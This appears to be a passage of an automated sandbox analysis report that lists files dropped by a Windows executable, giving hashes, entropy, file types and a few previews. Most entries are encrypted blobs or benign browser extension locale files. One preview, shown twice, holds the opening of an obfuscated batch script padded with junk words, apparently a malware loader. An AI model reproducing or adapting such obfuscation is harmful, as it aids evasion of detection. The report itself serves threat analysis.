                                                                                                                                                                                                                                                                SSDEEP:24:858yGS9PvCA433C+sCNC1skNkvQfhSHQU2L55e1yb/uBx39lt6DhBhhB4+H:e9n9mTsCNvEQH5O5U1nPKrhBV
                                                                                                                                                                                                                                                                MD5:6071B27763D5259C22095E7AFEDCE652
                                                                                                                                                                                                                                                                SHA1:A8375E869AE0348F5B191EAC5318FA7B7A1D333E
                                                                                                                                                                                                                                                                SHA-256:81F217A566284A757825BAA507D4F234D1607D642FF06ED552BB8AF183732CD8
                                                                                                                                                                                                                                                                SHA-512:95AE9789CF136F44412E8FDE79BE03F519090BEC58CF91E3194FB32611BA70964B170511DD9064DFB0A8045C0D224B24B12B9657BF77A1F54E95C9AC9291BF54
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\nB52P46OJD.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):91136
                                                                                                                                                                                                                                                                Entropy (8bit):7.998012724205869
                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                SSDEEP:1536:oFK2h6OFezqH8nNSGbeTb2wdAMFiq9mQcHPqJ30jTF/Ykp3dgyUoAt3:o/6jzqHISweTb2s9mQciJ3iF/lp3inou
                                                                                                                                                                                                                                                                MD5:AF7F5F456496DAC800C2783FC2556A83
                                                                                                                                                                                                                                                                SHA1:A18A4FD55C28298CE16114568A5FD262243569A4
                                                                                                                                                                                                                                                                SHA-256:CD7FD761B5C0CB65F8C49C5D855D62AC437A3AFA82D0ADC73CFA325431B46CB9
                                                                                                                                                                                                                                                                SHA-512:7ABA8BB4BD7604FE02D37FC5CE2D93FD61593523703126EAC21A387BFC671377A31690DA060033AA5CB9CD0FA5F5C9170149D64087E142E9D25B666881BC786F
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\nB52P46OJD.exe
                                                                                                                                                                                                                                                                File Type:tar archive (V7), type ' ' _\332j\3322, uid \020\02, gid \020\02, size \020\020\020, seconds , linkname
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):113094
                                                                                                                                                                                                                                                                Entropy (8bit):6.066456019294958
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:1536:A5el3EYrDWyu0uZo2+9BGmdATGODv7xvTphAiPChgZ2kOE6:A5elDWy4ZNoGmROL7F1G7ho2kOb
                                                                                                                                                                                                                                                                MD5:6E3A742D201F9A8D61FE1448427B31F3
                                                                                                                                                                                                                                                                SHA1:38C78737B789EB5A28AF0E4BBE65B5155977291D
                                                                                                                                                                                                                                                                SHA-256:E3974BC39F099657327F5A518E4F66E666E800B1E8C69704F6ACF63E40E7D1AE
                                                                                                                                                                                                                                                                SHA-512:FEF4161113B9442AFD34736ED49F77FA3599D3F98FD5A1497D356A0441D4DBCF0C251AE1F0B74B6E4E56C24C9FB2B7F0B6ED956E669C54E78DFD44E5311A435E
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\nB52P46OJD.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):131072
                                                                                                                                                                                                                                                                Entropy (8bit):5.966887409238837
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3072:H640ewy4Za9coRC2jfTq8QLeAg0Fuz08XvBNbjaAtsPK:a4V14ZgP0JaAOz04phdyC
                                                                                                                                                                                                                                                                MD5:10F104AB803F4F1D4347D2B338CB2715
                                                                                                                                                                                                                                                                SHA1:DA59AEC00DDFC5D78292CA69AAF38AAC278E1DE2
                                                                                                                                                                                                                                                                SHA-256:172F04E6F1B52AF90ACAF598B12722D6722AE704997D8373ED085DF4C2769C4B
                                                                                                                                                                                                                                                                SHA-512:DCA227B8FB0091F7267E75222E87699AB81C3683FD9FA3BF91B220263463EAE93CD5A4D08CD79FBF1E4C52648698957E34C8F837C357E0D20AFF7AE1094CFB9E
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\nB52P46OJD.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):63488
                                                                                                                                                                                                                                                                Entropy (8bit):7.997377329731832
                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                SSDEEP:1536:w8PZhyOyi5mHovmlml9TlJu9oA5/oATbontNxOXV7xi:w8PZhsmr/M5wATQFEVI
                                                                                                                                                                                                                                                                MD5:F74B04821F14C015E2F831CD7CF4D183
                                                                                                                                                                                                                                                                SHA1:E476864500CE75184B00DD96D92C19F6B182C06B
                                                                                                                                                                                                                                                                SHA-256:28B3F3C8E17079038709ECA61EB4FD0C513F3121E772463EE31C8F95CCCCD6D9
                                                                                                                                                                                                                                                                SHA-512:345A9ABD6A0B6A808D56E5818BCC1C60327861B3FE82726190590915A66DF93C4F77323BC8E83657BDBBBDC51449E7C352797AE0B145493A5943406A410D4B23
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\nB52P46OJD.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):94208
                                                                                                                                                                                                                                                                Entropy (8bit):7.998241155825975
                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                SSDEEP:1536:vAT5m+pNiZWn3HCUJsRhcSkwZrEouRLYngwtR2i7UIZjnfZzZIAe6H5f1+oa:vAdXpIZW3HARhcSrELYXtR2i7RVBSX+a
                                                                                                                                                                                                                                                                MD5:6E2264444F4EBFF4D68A451391683F27
                                                                                                                                                                                                                                                                SHA1:FE994645CBBEB2B626FA869A1BB81736C0873AE9
                                                                                                                                                                                                                                                                SHA-256:143AB2329CFA5252F0849F2C88380B2214E7C719D7901A3702F41C257A66583E
                                                                                                                                                                                                                                                                SHA-512:23DA9B93A5FD4BD2BB4C73D748D99F3D07ED76D735FD7EBF7736347EA048F1204C36A540E646C6D8A756DF656BC2F1985D5DBD42A9437E66478BBD0098870673
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\nB52P46OJD.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1400), with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):30197
                                                                                                                                                                                                                                                                Entropy (8bit):5.098081137116911
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:iWOkz6QQTyu8MCySaOcS6Y0tdbKiOiQwuIaSN9vH3:iK2jyu5N7Oco0tdbKiOiQwuIaSvv3
                                                                                                                                                                                                                                                                MD5:375387BEBE09983016B9851446A4AE0C
                                                                                                                                                                                                                                                                SHA1:B7D4CEBB37D8E2C572AB09FCC90EC3B9612CD51C
                                                                                                                                                                                                                                                                SHA-256:F8F952D3BFA71EE9259E5EEAC96B7EF6993B99160BAE31174A3048AFEF58372A
                                                                                                                                                                                                                                                                SHA-512:89A7095DC8F2C24F00D7DDF25AD280B281EDC21A5D8A9CBC2EDD93DF3551FFD9BF4EAF1A53607B3E2D2DB9DE4197C00220BFE576848BBB5F559FD1CB55907127
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:Set Suck=Z..BabwReturning-Frames-Urls-Paradise-Councils-..ClAbandoned-Uploaded-Bibliographic-Checking-Expressed-..vtRegardless-Producer-Abandoned-Navigation-..ucogMention-Spas-Kw-Pix-Format-Timer-..YPVs-To-..NaDStuck-Incomplete-Avg-Hoped-Grants-..WKsCleaning-Pissing-Slovakia-Cycling-Announced-..Set Ted=D..ZLZUltimately-Worthy-Southeast-..zPpMade-Confident-Credit-Repository-Stockholm-Thy-Minolta-Lifetime-Achieving-..muValentine-Ash-Survivors-..vKSanta-Holy-Announcements-Seminars-Severe-Contain-Brought-Clicks-News-..kMEncoding-Unauthorized-Accommodations-Packaging-Highlighted-..KDLegs-Silence-Dell-Tagged-Bank-Working-Um-..Set Email=h..fZyOSymphony-Detailed-Origins-..HebWallpapers-Tel-Ceo-..LUCrossing-Harold-Jobs-Chart-Sudden-Jenny-..vzHFFreebsd-Nike-Erik-Particles-Fbi-Liz-Nickname-Royal-..BaWinston-Solved-Var-Expired-..HJcSunday-Rentals-Tex-Latex-Volkswagen-Traveler-Sorts-Acrylic-Simpson-..PeBasename-Queens-..jQHCampaign-Homepage-..Set Recommendation=H..oTxMetals-Boy-Mortgages-Forbidden-
                                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1400), with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):30197
                                                                                                                                                                                                                                                                Entropy (8bit):5.098081137116911
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:iWOkz6QQTyu8MCySaOcS6Y0tdbKiOiQwuIaSN9vH3:iK2jyu5N7Oco0tdbKiOiQwuIaSvv3
                                                                                                                                                                                                                                                                MD5:375387BEBE09983016B9851446A4AE0C
                                                                                                                                                                                                                                                                SHA1:B7D4CEBB37D8E2C572AB09FCC90EC3B9612CD51C
                                                                                                                                                                                                                                                                SHA-256:F8F952D3BFA71EE9259E5EEAC96B7EF6993B99160BAE31174A3048AFEF58372A
                                                                                                                                                                                                                                                                SHA-512:89A7095DC8F2C24F00D7DDF25AD280B281EDC21A5D8A9CBC2EDD93DF3551FFD9BF4EAF1A53607B3E2D2DB9DE4197C00220BFE576848BBB5F559FD1CB55907127
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:Set Suck=Z..BabwReturning-Frames-Urls-Paradise-Councils-..ClAbandoned-Uploaded-Bibliographic-Checking-Expressed-..vtRegardless-Producer-Abandoned-Navigation-..ucogMention-Spas-Kw-Pix-Format-Timer-..YPVs-To-..NaDStuck-Incomplete-Avg-Hoped-Grants-..WKsCleaning-Pissing-Slovakia-Cycling-Announced-..Set Ted=D..ZLZUltimately-Worthy-Southeast-..zPpMade-Confident-Credit-Repository-Stockholm-Thy-Minolta-Lifetime-Achieving-..muValentine-Ash-Survivors-..vKSanta-Holy-Announcements-Seminars-Severe-Contain-Brought-Clicks-News-..kMEncoding-Unauthorized-Accommodations-Packaging-Highlighted-..KDLegs-Silence-Dell-Tagged-Bank-Working-Um-..Set Email=h..fZyOSymphony-Detailed-Origins-..HebWallpapers-Tel-Ceo-..LUCrossing-Harold-Jobs-Chart-Sudden-Jenny-..vzHFFreebsd-Nike-Erik-Particles-Fbi-Liz-Nickname-Royal-..BaWinston-Solved-Var-Expired-..HJcSunday-Rentals-Tex-Latex-Volkswagen-Traveler-Sorts-Acrylic-Simpson-..PeBasename-Queens-..jQHCampaign-Homepage-..Set Recommendation=H..oTxMetals-Boy-Mortgages-Forbidden-
                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\nB52P46OJD.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):54352
                                                                                                                                                                                                                                                                Entropy (8bit):7.9971503948340485
                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                SSDEEP:768:MLQOmJAKbDl5ByxLyIh7tQ65pMPE1VOldVX4qZmgVh8NHaDtdK/ePyhiq467oN:+mVl54hR5Wc1VOlzX4ngDlnqxhS678
                                                                                                                                                                                                                                                                MD5:AC33880D844C5B1A1F52861EF2C6C559
                                                                                                                                                                                                                                                                SHA1:3FC04278639E1EA4D92B3610101116A3B989D023
                                                                                                                                                                                                                                                                SHA-256:18A39265B0DBC8C7A21EAE19C2013AC23E09ED9B7D2DF966FE260BFB0B909C20
                                                                                                                                                                                                                                                                SHA-512:B1223AFB6270DA049DE253561B6F93B1DA60BF9F961ED6AE8EC3775B2C4FA732F603A817855E240013C088C129EE5CC03A8271C5963DC8E79FB804254F7D7124
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, comment: "Lavc59.36.100", baseline, precision 8, 1280x720, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):60895
                                                                                                                                                                                                                                                                Entropy (8bit):7.939696345300614
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:1536:4HGkkLn9yZiHv+h/QZbstN6LAk2AuzOp9Ckrz/M7t9xdLoLuGs:4HtK9zv+h/g10k2A4OXz/M7t9Poi
                                                                                                                                                                                                                                                                MD5:EFFE8565389577DD1334F05084888A9C
                                                                                                                                                                                                                                                                SHA1:AB4236187C2858929688E72679E80305BB59893D
                                                                                                                                                                                                                                                                SHA-256:57A826B38417F9CD6F186E283B9C63798CC7C12CD3B84F00EF038378B332E800
                                                                                                                                                                                                                                                                SHA-512:B0C7D9D9D868B7F1444A45C01B391186AC60DBA2937B89673FA1C9BF6D6EDB83E7F08E21B2689E8796C73F4B6E819F1205982B4DE06B406A2AA6F00CFA67C78A
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:L:L
                                                                                                                                                                                                                                                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1420
                                                                                                                                                                                                                                                                Entropy (8bit):5.399595499944615
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:YJxF5sQ5szAW01Rp5yK10YO5qv70VhQu5Fa0rZ5HjdF0g30o5M:YJxF5sQ5sEW01X5y60YO5qD0VH5Fa0rg
                                                                                                                                                                                                                                                                MD5:5F744ABB8D0E4C91046C967D16E184A9
                                                                                                                                                                                                                                                                SHA1:1AB2796E73C508680AEBF88789683300808A9FE8
                                                                                                                                                                                                                                                                SHA-256:43DD721D684D2AE7EBAD78EA708B9F6BCA398DCDC0D6397098649B372B0300C6
                                                                                                                                                                                                                                                                SHA-512:6EFB3C373D7E4A06B650243BD06611C19D06345B8C60B55F568350BD3ED734E1FCB2288A6E8A5D8F36ECA2A2278AA73D30FB5C2193F8C3C988B5B59AD2EEF480
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"logTime": "1005/081724", "correlationVector":"2/PmMr7SOFFRIqTwW+HesJ","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/081729", "correlationVector":"mBsci4p0IuAlecFQAh3IDU","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/081729", "correlationVector":"EFCCE5F7ECC74238A0D17C500D8EB81C","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/083130", "correlationVector":"jkXXrPbML/1ucIa5c7okZ6","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/083130", "correlationVector":"CECEB17551BE48CCBF3DD12E07118D84","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/083241", "correlationVector":"WUtA7xoJfeUJPFSRRtPAng","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/083242", "correlationVector":"B7F67C44DD3147F7BE748158D3F8E7B5","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/083444", "correlationVector":"6kKZpL8SvSsrBcj/Fl+tva","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/083445", "correlationVector":"94D95442
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):31335
                                                                                                                                                                                                                                                                Entropy (8bit):7.694019108205432
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:514ugFV0910SWyR5kNVdS3sNp/xm3MbiMuYEDlyFUyv6E/ty8:5WcDWyRKNVd2M/IxMuYEDlymsTQ8
                                                                                                                                                                                                                                                                MD5:6B72597205C77D3E40E1A35BEE403801
                                                                                                                                                                                                                                                                SHA1:6BECEE055C6E057AF9475B6D651B4EE561D02F20
                                                                                                                                                                                                                                                                SHA-256:C899297FBDFC88C1634B1145A087FDB5BE17172FD786C078B299557B22F06DEB
                                                                                                                                                                                                                                                                SHA-512:7CB1A98E0C7FBB349D9CB681233A9F4ED22A1C3FAADCDF1BC270B04BD97D3FC41AB6F762B2F5F231281D63D96AC3D243640BA81D5E8CCD9F54486B4F538CA8B4
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):154477
                                                                                                                                                                                                                                                                Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):4982
                                                                                                                                                                                                                                                                Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                                MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                                SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                                SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                                SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):908
                                                                                                                                                                                                                                                                Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                                MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                                SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                                SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                                SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1285
                                                                                                                                                                                                                                                                Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                                MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                                SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                                SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                                SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1244
                                                                                                                                                                                                                                                                Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                                                                MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                                                                SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                                                                SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                                                                                SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):977
                                                                                                                                                                                                                                                                Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                                                                MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                                                                SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                                                                SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                                                                SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):3107
                                                                                                                                                                                                                                                                Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                                                                                                MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                                                                                SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                                                                                SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                                                                                SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1389
                                                                                                                                                                                                                                                                Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                                Encrypted:false
